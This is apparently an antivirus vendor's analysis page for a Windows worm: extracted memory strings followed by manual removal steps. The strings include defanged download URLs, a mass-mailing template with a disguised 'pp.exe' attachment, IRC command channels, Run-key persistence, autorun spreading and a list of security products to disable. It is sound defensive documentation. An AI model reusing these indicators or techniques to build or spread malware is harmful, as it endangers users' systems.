Executable Files (*.exe;*.dll;*.ocx)|*.exe;*.dll;*.ocx|All Files (*.*)|*.*|
Executable Files (*.exe)|*.exe|All Files (*.*)|*.*|
%d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d
REGEDIT.EXE
LoadTypeLib( %s ) failed.
*.tlb
The %s interface viewer failed to load.
Could not convert the CLSID of the %s interface viewer.
Interface\%S\OLEViewerIViewerCLSID
Interface\%S
The file droped (%s) is not a valid persistent OLE object or Type Library file.
%s\Insertable
%s\NotInsertable
2disp.dll
2.dll
2prox.dll
aut32.dll
cnv32.dll
2pr32.dll
prx32.dll
32.dll
%s <no name>
%s\Implemented Categories\%s
%S <no name>
[AppID: %s]
AppID\%s
%s (Ver %s)
QueryInterface for %s returned a failure code other than E_NOINTERFACE.
IMoniker::BindToObject failed on the file moniker created from ( "%s" ).
_%S <no name>
LoadRegTypeLib(%s, %u, %u, %lu, ...) failed.
Warning: MkParseDisplayName only ate up to "%s".
MkParseDisplayName(... "%s" ...) failed.
%s (%s)
LoadRegTypeLib(%u, %u, %lu, &u ...) failed.
classid="clsid:%S"
FileType\%s
Interface\%s
TypeLib\%s
%s = %s
%s [%s] = %s
%s [<no name>] = %s
%#04XX (%lu)
%s\%s
Couldn't get address of SedDiscrectionaryAclEditor() in ACLEDIT.DLL!
Couldn't load ACLEDIT.DLL!
ACLEDIT.DLL
APPID\%s
CLSID\%s\%s
CLSID\%s\LocalServer32
FACILITY_WINDOWS
VIEW_S_FIRST...VIEW_S_LAST
VIEW_E_FIRST...VIEW_E_LAST
REGDB_S_FIRST...REGDB_S_LAST
REGDB_E_FIRST...REGDB_E_LAST
OLE_S_FIRST...OLE_S_LAST
OLE_E_FIRST...OLE_E_LAST
OLEOBJ_S_FIRST...OLEOBJ_S_LAST
OLEOBJ_E_FIRST...OLEOBJ_E_LAST
MK_S_FIRST...MK_S_LAST
MK_E_FIRST...MK_E_LAST
MARSHAL_S_FIRST...MARSHAL_S_LAST
MARSHAL_E_FIRST...MARSHAL_E_LAST
INPLACE_S_FIRST...INPLACE_S_LAST
INPLACE_E_FIRST...INPLACE_E_LAST
ENUM_S_FIRST...ENUM_S_LAST
ENUM_E_FIRST...ENUM_E_LAST
DRAGDROP_S_FIRST...DRAGDROP_S_LAST
DRAGDROP_E_FIRST...DRAGDROP_E_LAST
DATA_S_FIRST...DATA_S_LAST
DATA_E_FIRST...DATA_E_LAST
CO_S_FIRST...CO_S_LAST
CO_E_FIRST...CO_E_LAST
CONVERT10_S_FIRST...CONVERT10_S_LAST
CONVERT10_E_FIRST...CONVERT10_E_LAST
CLIPBRD_S_FIRST...CLIPBRD_S_LAST
CLIPBRD_E_FIRST...CLIPBRD_E_LAST
CLIENTSITE_S_FIRST...CLIENTSITE_S_LAST
CLIENTSITE_E_FIRST...CLIENTSITE_E_LAST
CLASSFACTORY_S_FIRST...CLASSFACTORY_S_LAST
CLASSFACTORY_E_FIRST...CLASSFACTORY_E_LAST
CACHE_S_FIRST...CACHE_S_LAST
CACHE_E_FIRST...CACHE_E_LAST
REGDB_E_KEYMISSING
OLE_E_ADVISENOTSUPPORTED
MK_E_INTERMEDIATEINTERFACENOTSUPPORTED
CO_E_SERVER_EXEC_FAILURE
CACHE_S_FORMATETC_NOTSUPPORTED
severity: %s, facility: %s ($lX)
range: %s ($lX)
%s ($lX)
<No system message defined> %s
%s %s
~$SSh
PQSSh
MFC42.DLL
__p__acmdln
MSVCRT.dll
RegCloseKey
RegOpenKeyExA
RegEnumKeyA
RegOpenKeyA
RegDeleteKeyA
RegQueryInfoKeyA
RegCreateKeyExA
ADVAPI32.dll
WinExec
KERNEL32.dll
GDI32.dll
USER32.dll
SHELL32.dll
COMCTL32.dll
ole32.dll
OLEAUT32.dll
VERSION.dll
DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|
.?AVCCmdTarget@@
TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|
.PAVCException@@
AllFiles(*.*)|*.*|
.PAVCOleException@@
7 7$7(7,7074787<7@7
9 9$9(9,9
;!<4<:<@<_<
5o6Z6
6 737_7}7
(pL%C#
$.RB(t
p.FdZ
SHELL32.DLL
ShellExecuteA
KERNEL32.DLL
%original file name%.exe
.reloc
c:\%original file name%.exe
hXXp://acemoglusucuklari.com.tr/images/logo.gif
hXXp://a-bring.com/sanybook/logo.gif
hXXp://tn69abi.com/images/logof.gif
hXXp://gim8.pl/logo.gif
hXXp://aclassalerts.com/images/logo.gif
hXXp://VVV.3pindia.in/images/logo.gif
hXXp://aci.gratix.com.br/logo.gif
hXXp://1s2qvh91x.site.aplus.net/images/logo.gif
hXXp://abb.ind.in/logo.gif
hXXp://VVV.akpartisariveliler.com/images/img.gif
4j14/logo.gif
.info/J
home.gifI888
h.rata
Bkrnl.exe?
= =$=(=,=
322%2`.50728)
.klkjw:9fqwi
FamXf39.sys
.pBTa8
%s:*:
Bg.laXV
&?%x=
GUrlA'
Web%w|nc
HTTP)
2GUARDCMD.
.ENHCDM
PL/KPCKwWEB
MM.PFW.
.bssf
J:CRT
WS2_32.dll
SHFileOperationA
USER32.DLL
ADVAPI32.DLL
MPR.DLL
WSOCK32.DLL
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
RegNotifyChangeKeyValue
\runouce.exe
=.wabt!=.adct$=r.dbt
=.doct
=.xlst
=.exetS=.scrtL=.htmt
readme.eml
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
btamail.net.cn
HELO btamail.net.cn
MAIL FROM: imissyou@btamail.net.cn
RCPT TO: %s
FROM: %s@yahoo.com
TO: %s
SUBJECT: %s is comming!
Content-Type: audio/x-wav; name="pp.exe"
.idata
g.ogP
%DgO$w
.Access
oleview.hlp
2.10.050
oleview.EXE
To select a class: Double click the name or highlight the name with the cursor keys and press return.
OLEViewer Files (*.ore)
oleview.Document
Replace%Select the entire document
.Bind to a file via a File Moniker
Show OLE 1.0 Objects@Show objects that have the NotInsertable key.
Show ContainersGShow Objects that have the Control key (OLE Controls)
Delete from RegistryAShow Objects that have the Insertable Key
 Run the Windows Registry Editor
Microsoft^Could not find IVIEWERS.DLL to auto-register the ITypeLib and IDataObject interface viewers.
mOLEViewer will operate correctly without this DLL, however you will not be able to use the interface viewers.<Could not find DllRegisterServer function in IVIEWERS.DLL.
B Do you want to try to find IVIEWERS.DLL in a different location? DllRegisterServer in IVIEWERS.DLL failed.
;Could not find COMCAT.DLL (Component Categories Manager).
rOLEViewer will operate correctly without this DLL, however you will not be able to fully use component categories.:Could not find DllRegisterServer function in COMCAT.DLL.
@ Do you want to try to find COMCAT.DLL in a different location?
.Display the viewer for the selected item.
View0Show or do not show hidden component categories.LToggle the display of component categories that are not meant to be visible.[Create an instance of the selected object on a specific machine.
Create Instance On MachineBEnables or disables "ActivateAtStorage" activation for this class.5View and set the Network OLE options for this object.0Configure class activation and security options.-Change machine wide Distributed COM settings.KUse CLSCTX_REMOTE_SERVER when calling CoGetClassObject
CLSCTX_REMOTE_SERVER>Copy the GUID of the currently selected item to the clipboard..Toggle between expert and novice display mode.9Copy an HTML <object> tag for this item to the clipboard.
All Files (*.*)
No error message is available.'An unsupported operation was attempted.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else..An unexpected error occurred while reading %1..An unexpected error occurred while writing %1.
Access to %1 was denied..An invalid file handle was associated with %1.<%1 could not be removed because it is the current directory.6%1 could not be created because the directory is full.
Seek failed on A hardware I/O error was reported while accessing %1.0A sharing violation occurred while accessing %1.0A locking violation occurred while accessing %1.
Disk full while accessing %1..An attempt was made to access %1 past its end.
No error occurred.-An unknown error occurred while accessing %1./An attempt was made to write to the reading %1..An attempt was made to access %1 past its end.0An attempt was made to read from the writing %1.
#Unable to load mail system support.

%original file name%.exe_1908_rwx_00220000_00001000:

Bv%original file name%.exeM_1908_

%original file name%.exe_1908_rwx_01001000_00001000:

Warning! Certain features of this program may be unavailable to you because you are not logged in as an administrator.
iviewers.dll
IVIEWERS.DLL
Component Categories\%s
comcat.dll
Comcat.DLL
CLSID\%s
%s - %s. By Charlie Kindel,
The command line (%s) does not contain a valid persistent OLE object, ProgID, or Type Library file.
CoCreateInstance failed using the CLSID for '%s'

%original file name%.exe_1908_rwx_01046000_0000A000:

USER32.DLL
ADVAPI32.DLL
MPR.DLL
WSOCK32.DLL
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
WinExec
RegNotifyChangeKeyValue
RegOpenKeyA
\runouce.exe
=.wabt!=.adct$=r.dbt
=.doct
=.xlst
=.exetS=.scrtL=.htmt
readme.eml
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
btamail.net.cn
HELO btamail.net.cn
MAIL FROM: imissyou@btamail.net.cn
RCPT TO: %s
FROM: %s@yahoo.com
TO: %s
SUBJECT: %s is comming!
Content-Type: audio/x-wav; name="pp.exe"
.idata
.reloc
KERNEL32.dll
JOIN #.%d
DSTAMP %ddd
\USERINIT.EXE
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
fbibiz.com
olmbra.com
meggay.com
regexy.com
inreos.com
NICK yhzlxkjy
SFC.DLL
SFC_OS.DLL
SHLWAPI.DLL
WININET.DLL
%.6x . . :%c%.8x%x  *%s
KERNEL32.DLL
windowsupdate
drweb

%original file name%.exe_1780_rwx_01001000_00001000:

Warning! Certain features of this program may be unavailable to you because you are not logged in as an administrator.
iviewers.dll
IVIEWERS.DLL
Component Categories\%s
comcat.dll
Comcat.DLL
CLSID\%s
%s - %s. By Charlie Kindel,
The command line (%s) does not contain a valid persistent OLE object, ProgID, or Type Library file.
CoCreateInstance failed using the CLSID for '%s'

taskhost.exe_1940_rwx_00120000_00002000:

SHELL32.DLL
ShellExecuteA
KERNEL32.DLL
.reloc

%original file name%.exe_1780_rwx_0102B000_00019000:

(pL%C#
$.RB(t
p.FdZ
SHELL32.DLL
ShellExecuteA
KERNEL32.DLL
%original file name%.exe
.reloc
c:\%original file name%.exe
hXXp://acemoglusucuklari.com.tr/images/logo.gif
hXXp://a-bring.com/sanybook/logo.gif
hXXp://tn69abi.com/images/logof.gif
hXXp://gim8.pl/logo.gif
hXXp://aclassalerts.com/images/logo.gif
hXXp://VVV.3pindia.in/images/logo.gif
hXXp://aci.gratix.com.br/logo.gif
hXXp://1s2qvh91x.site.aplus.net/images/logo.gif
hXXp://abb.ind.in/logo.gif
hXXp://VVV.akpartisariveliler.com/images/img.gif
4j14/logo.gif
.info/J
home.gifI888
.text
KERNEL32.dll
h.rata
Bkrnl.exe?
= =$=(=,=
322%2`.50728)
.klkjw:9fqwi
FamXf39.sys
.pBTa8
%s:*:
Bg.laXV
&?%x=
GUrlA'
Web%w|nc
HTTP)
2GUARDCMD.
.ENHCDM
PL/KPCKwWEB
MM.PFW.
.bssf
J:CRT
ADVAPI32.dll
MSVCRT.dll
SHELL32.dll
USER32.dll
WS2_32.dll
RegCloseKey
SHFileOperationA

%original file name%.exe_1780_rwx_01048000_00001000:

HELO btamail.net.cn
MAIL FROM: imissyou@btamail.net.cn
RCPT TO: %s
FROM: %s@yahoo.com
TO: %s
SUBJECT: %s is comming!
Content-Type: audio/x-wav; name="pp.exe"
.idata
.reloc
KERNEL32.dll

%original file name%.exe_1780_rwx_0104E000_00001000:

%DgO$w

%original file name%.exe_1780_rwx_011B0000_0108E000:

c:\windows
hXXp://acemoglusucuklari.com.tr/images/logo.gif
hXXp://a-bring.com/sanybook/logo.gif
hXXp://tn69abi.com/images/logof.gif
hXXp://gim8.pl/logo.gif
hXXp://aclassalerts.com/images/logo.gif
hXXp://VVV.3pindia.in/images/logo.gif
hXXp://aci.gratix.com.br/logo.gif
hXXp://1s2qvh91x.site.aplus.net/images/logo.gif
hXXp://abb.ind.in/logo.gif
hXXp://VVV.akpartisariveliler.com/images/img.gif
C:\Windows\system32\drivers\jpppn.sys
4239484882
SHELL32.DLL
ShellExecuteA
KERNEL32.DLL
.reloc
hXXp://89.119.67.154/testo5/
hXXp://kukutrustnet777.info/home.gif
hXXp://kukutrustnet888.info/home.gif
hXXp://kukutrustnet987.info/home.gif
.text
KERNEL32.dll
USER32.dll
h.rdata
H.data
ntoskrnl.exe
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50728)
Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion
hXXp://VVV.klkjwre9fqwieluoi.info/
hXXp://kukutrustnet777888.info/
Software\Microsoft\Windows\CurrentVersion\policies\system
Software\Microsoft\Windows\ShellNoRoam\MUICache
%s:*:Enabled:ipsec
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
GdiPlus.dll
hXXp://
ipfltdrv.sys
VVV.microsoft.com
?%x=%d
&%x=%d
SYSTEM.INI
USER32.DLL
.%c%s
\\.\amsint32
NTDLL.DLL
autorun.inf
ADVAPI32.DLL
win%s.exe
%s.exe
WININET.DLL
InternetOpenUrlA
avast! Web Scanner
Avira AntiVir Premium WebGuard
cmdGuard
cmdAgent
Eset HTTP Server
ProtoPort Firewall service
SpIDer FS Monitor for Windows NT
Symantec Password Validation
WebrootDesktopFirewallDataService
WebrootFirewall
%d%d.tmp
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
%s\%s
%s\Software\Microsoft\Windows\CurrentVersion\Ext\Stats
Software\Microsoft\Windows\CurrentVersion\Ext\Stats
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
Explorer.exe
A2CMD.
ASHWEBSV.
AVGCC.AVGCHSVX.
DRWEB
DWEBLLIO
DWEBIO
FSGUIEXE.
MCVSSHLD.
NPFMSG.
SYMSPORT.
WEBSCANX.
.adata
M_%d_
%c%d_%d
?456789:;<=
!"#$%&'()* ,-./0123
GetProcessHeap
GetWindowsDirectoryA
RegEnumKeyExA
RegDeleteKeyA
RegOpenKeyExA
RegCreateKeyA
RegCloseKey
SHFileOperationA
&3&3&3&389
.rdata
.data
Bkrnl.exe?
= =$=(=,=
322%2`.50728)
.klkjw:9fqwi
FamXf39.sys
.pBTa8
%s:*:
Bg.laXV
&?%x=
GUrlA'
Web%w|nc
HTTP)
2GUARDCMD.
.ENHCDM
PL/KPCKwWEB
MM.PFW.
.bssf
J:CRT
ADVAPI32.dll
MSVCRT.dll
SHELL32.dll
WS2_32.dll

%original file name%.exe_1780_rwx_02870000_00002000:

SHELL32.DLL
ShellExecuteA
KERNEL32.DLL
.reloc

%original file name%.exe_1780_rwx_028C0000_00001000:

Bv%original file name%.exeM_1780_

taskhost.exe_1940_rwx_00370000_00001000:

Bvtaskhost.exeM_1940_

Dwm.exe_2008_rwx_00090000_00002000:

SHELL32.DLL
ShellExecuteA
KERNEL32.DLL
.reloc

Dwm.exe_2008_rwx_001D0000_00001000:

Bvdwm.exeM_2008_

Explorer.EXE_2024_rwx_01EE0000_00002000:

SHELL32.DLL
ShellExecuteA
KERNEL32.DLL
.reloc

Explorer.EXE_2024_rwx_02D60000_00001000:

Bvexplorer.exeM_2024_

Explorer.EXE_2024_rwx_03A10000_00001000:

C:\Windows\system32\runouce.exe

conhost.exe_2520_rwx_001B0000_00002000:

SHELL32.DLL
ShellExecuteA
KERNEL32.DLL
.reloc

conhost.exe_2520_rwx_001C0000_00001000:

Bvconhost.exeM_2520_


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
  3. Delete the original Worm file.
  4. Delete or disinfect the following files created/modified by the Worm:

    C:\Windows\system.ini (70 bytes)
    C:\chkc.exe (130 bytes)
    %Program Files%\Adobe\Reader 9.0\Reader\reader_sl.exe (1312 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\winfmngob.exe (741 bytes)
    C:\autorun.inf (279 bytes)
    %Program Files%\Common Files\Java\Java Update\jusched.exe (784 bytes)
    C:\Windows\System32\runouce.exe (1504988 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Reader9\Setup.exe (2744 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Setup.exe (3288 bytes)

  5. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Runonce" = "C:\Windows\system32\runouce.exe"

  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  7. Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
  8. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now